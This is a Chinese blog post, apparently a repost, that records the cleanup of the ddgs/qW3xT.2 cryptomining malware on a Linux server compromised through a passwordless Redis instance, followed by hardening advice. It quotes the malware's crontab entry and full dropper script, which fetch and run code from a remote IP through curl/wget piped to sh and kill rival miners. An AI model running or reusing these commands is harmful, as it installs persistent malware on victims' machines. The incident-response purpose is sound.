• 企业400电话
  • 微网小程序
  • AI电话机器人
  • 电商代运营
  • 全 部 栏 目

    企业400电话 网络优化推广 AI电话机器人 呼叫中心 网站建设 商标✡知产 微网小程序 电商运营 彩铃•短信 增值拓展业务
    linux服务器被植入ddgs、qW3xT.2挖矿病毒的处理实战记录

    前言

    随着虚拟货币的疯狂炒作,挖矿病毒已经成为不法分子利用最为频繁的攻击方式之一。病毒传播者可以利用个人电脑或服务器进行挖矿,具体现象为电脑CPU占用率高,C盘可使用空间骤降,电脑温度升高,风扇噪声增大等问题。

    本文主要介绍的是关于linux植入ddgs、qW3xT.2挖矿病毒的处理方法,下面话不多说了,来一起看看详细的介绍吧

    被入侵后的现象:

    发现有qW3xT.2与ddgs两个异常进程,消耗了较高的cpu,kill掉后 过一会就会重新出现。

    kill 掉这两个异常进程后,过一段时间看到了如下进程:

    首先在/etc/sysconfig/crotnab中的定时任务没有找到定时脚本,输入crontab -e 在其中找到了该定时任务

    */5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh
    <span style="font-size: 15px;">查询了下149.56.106.215在美国,i.sh 脚本内容如下:</span>
    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
    echo "" > /var/spool/cron/root
    echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
    echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo "" > /var/spool/cron/crontabs/root
    echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
    echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
    ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
    if [ ! -f "/tmp/ddgs.3013" ]; then
     wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
     curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
    fi
    chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013
    
    ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
    #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
    #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

    处理方法:

    1.删除  crontab -e 中

    */5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

    2.清除/root/.ssh/authorized_keys 中黑客设置的免密登录内容

    3.修改redis密码

    4.修改root与登录账户密码

    安全建议:

    1.配置bind选项,限定可以连接Redis服务器的IP,修改 Redis 的默认端口6379 配置认证,也就是AUTH,设置密码,密码会以明文方式保存在Redis配置文件中

    2.配置rename-command 配置项 “RENAME_CONFIG”,这样即使存在未授权访问,也能够给攻击者使用config 指令加大难度

    3.如果可以在防火墙中屏蔽redis外网      

    入侵方式:

    收集了相关资料,了解到其是利用redis漏洞,未设置密码或密码太简单,导致的被入侵。具体方式可以参考

    https://www.jb51.net/article/147375.htm

    reids修改密码方法如下:

    redis-cli -h 127.0.0.1 -p 6379
    config get requirepass ##获取当前密码
    config set requirepass "yourpassword" ##设置当前密码,服务重新启动后又会置为默认,即无密码;

    永久生效方法为,打开redis配置文件redis.conf,找到requirepass值修改密码,如下:

    requirepass yourpassword ##此处注意,行前不能有空格

    总结

    以上就是这篇文章的全部内容了,希望本文的内容对大家的学习或者工作具有一定的参考学习价值,如果有疑问大家可以留言交流,谢谢大家对脚本之家的支持。

    上一篇:Linux下的crontab定时执行任务命令详解
    下一篇:详解Linux文件操作知识点
  • 相关文章
  • 

    © 2016-2020 巨人网络通讯

    时间:9:00-21:00 (节假日不休)

    地址:江苏信息产业基地11号楼四层

    《增值电信业务经营许可证》 苏B2-20120278

    linux服务器被植入ddgs、qW3xT.2挖矿病毒的处理实战记录 linux,服务器,被,植入,ddgs,